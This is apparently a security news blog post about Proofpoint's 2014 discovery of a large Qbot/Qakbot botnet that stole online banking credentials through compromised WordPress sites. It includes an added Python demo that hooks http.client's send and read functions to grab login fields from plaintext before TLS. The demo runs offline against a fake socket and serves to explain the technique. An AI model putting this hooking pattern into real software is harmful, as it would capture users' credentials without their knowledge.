500,000 PCs Infected with Qbot Malware to Steal Financial Data

Yikes, a botnet with over 500,000 computers?

That’s what Proofpoint security researchers uncovered after investigating a large number of WordPress websites that had been compromised to perform drive-by-download attacks on unsuspecting visitors.

Proofpoint researchers report that the Russian-speaking cybercrime group behind the attacks set up the drive-by downloads by logging in to the sites with purchased lists of website admin credentials. The drive-by-download exploits targeted browser and browser-plugin vulnerabilities (Java, Flash and PDF reader) to silently plant Qbot/Qakbot on the victim's machine.

Qbot / Qakbot

Qbot, aka Qakbot, is a backdoor Trojan that connects to a remote command-and-control server, allowing attackers to take remote control of the infected system. It can download and install additional software, and it steals online banking credentials using a technique called "browser hooking."

Online banking sessions are protected in transit by SSL/TLS, but Qbot doesn't need to break the encryption: it hooks the browser's own networking functions and reads the data where the browser handles it in the clear, before it is encrypted on the way out and after it has been decrypted on the way in. The captured credentials and session data are then relayed to Qbot's command-and-control server.
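To make the browser-hooking idea concrete, here is an added example that is not code from Proofpoint's report or from Qbot itself. It is written in Python and uses http.client as a stand-in for a browser's HTTP layer, with a fake socket object in place of the TLS socket so that it runs offline with no network at all. The names FakeTlsSocket, install_browser_hooks, extract_credentials, simulate_login and hooks_installed, the host bank.example, the canned server reply and the sample credentials are all constructed for the demo. Qbot does the equivalent with native API hooks inside the browser process on Windows; what the example shows is only where the hook has to sit: on the function that hands plaintext to the TLS layer, and on the one that returns decrypted bytes to the application.

```python
import http.client
import io
from urllib.parse import parse_qs, urlencode


class FakeTlsSocket:
    """Stand-in for the ssl.SSLSocket of a real HTTPS connection: records what
    the HTTP layer hands it (in a real socket this is where plaintext becomes
    TLS records) and answers with a canned reply (constructed sample data)."""
    BODY = b"<html>Welcome back. Balance: 1234.56</html>"
    CANNED_REPLY = (
        b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
        b"Content-Length: " + str(len(BODY)).encode() + b"\r\n\r\n" + BODY
    )

    def __init__(self):
        self.wire = bytearray()   # what a network observer would get to see

    def sendall(self, data):
        self.wire += data

    def makefile(self, mode="rb", *args, **kwargs):
        return io.BytesIO(self.CANNED_REPLY)  # http.client reads the reply here

    def close(self):
        pass


# Everything the hooks intercept lands here, like a form grabber's buffer.
grabbed = {"requests": [], "responses": []}


def install_browser_hooks():
    """Patch the HTTP layer the way a man-in-the-browser trojan patches a
    browser's network functions: outbound just before data reaches the TLS
    socket, inbound just after it has been decrypted. Returns an undo function."""
    original_send = http.client.HTTPConnection.send
    original_read = http.client.HTTPResponse.read

    def hooked_send(self, data):
        if isinstance(data, (bytes, bytearray, memoryview)):
            grabbed["requests"].append(bytes(data))  # still plaintext here
        return original_send(self, data)

    def hooked_read(self, amt=None):
        data = original_read(self, amt)              # already decrypted here
        grabbed["responses"].append(data)
        return data

    http.client.HTTPConnection.send = hooked_send   # HTTPSConnection inherits it
    http.client.HTTPResponse.read = hooked_read

    def uninstall():
        http.client.HTTPConnection.send = original_send
        http.client.HTTPResponse.read = original_read

    return uninstall


def hooks_installed():
    return http.client.HTTPConnection.send.__name__ == "hooked_send"


def extract_credentials(request_chunks):
    """What a form grabber does with captured plaintext: skip the header block
    (its own chunk, sent before the body) and read the urlencoded login fields."""
    creds = {}
    for chunk in request_chunks:
        if b"\r\n" in chunk:
            continue
        fields = parse_qs(chunk.decode("utf-8", errors="replace"))
        for name in ("username", "password"):
            if name in fields:
                creds[name] = fields[name][0]
    return creds


def simulate_login(username, password, host="bank.example"):
    """One login through the stand-in browser with the hooks installed, then restored."""
    grabbed["requests"].clear()
    grabbed["responses"].clear()
    uninstall = install_browser_hooks()
    try:
        conn = http.client.HTTPConnection(host)
        conn.sock = sock = FakeTlsSocket()  # bypass connect(): no network at all
        form = urlencode({"username": username, "password": password}).encode()
        conn.request("POST", "/login", body=form,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        reply = conn.getresponse().read()
        conn.close()
    finally:
        uninstall()
    return {
        "credentials": extract_credentials(grabbed["requests"]),
        "reply_seen_by_hook": grabbed["responses"][0],
        "reply_seen_by_app": reply,
        "handed_to_tls_layer": bytes(sock.wire),
    }
```

Calling simulate_login("alice", "Sample-Passw0rd") returns the login fields the hook pulled out of the POST body and the same reply bytes the application saw, and the hooks are gone again afterwards. In the fake the bytes handed to the socket are still readable because nothing encrypts them; on a real HTTPSConnection that same send() call feeds an ssl.SSLSocket, so only the hook, not a packet capture, would see the password. That is the whole trick: TLS protects the data on the wire, not against code running inside the endpoint that handles the plaintext.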

Qbot / Qakbot Victims

[Figure: Qbot botnet geolocation and OS share. Image credit: Proofpoint]

Researchers say over 800,000 online banking account logins have been stolen by this group, although it’s unclear how much money may have been siphoned out of victim accounts.

More than half of the infected computers are running Windows XP (52%), which didn't surprise researchers, since Microsoft ended support for the OS back in April of this year (2014). Windows 7 accounts for the second largest share of infected systems at 39%, while Windows Vista makes up 7% and Windows Server 2003 1%.

An overwhelming majority of the victims are located in the United States (75%).

Keeping Your PC Safe

To stay safe, Proofpoint recommends that users:

  • Keep their operating system and third-party software up to date and fully patched with the latest updates. (Psst.. that means upgrading from XP!)
  • Consider disabling or removing Java from your PC.
  • Disable JavaScript in your browser or maybe look into using a plugin like NoScript.

Additional information, including more details on how the drive-by-download attacks work, Qbot functionality and how to protect your WordPress website is available in Proofpoint’s report (registration required).

Like this post? Follow us online by liking us on Facebook, following us on Twitter (@thechipmerchant), or circling us on Google+.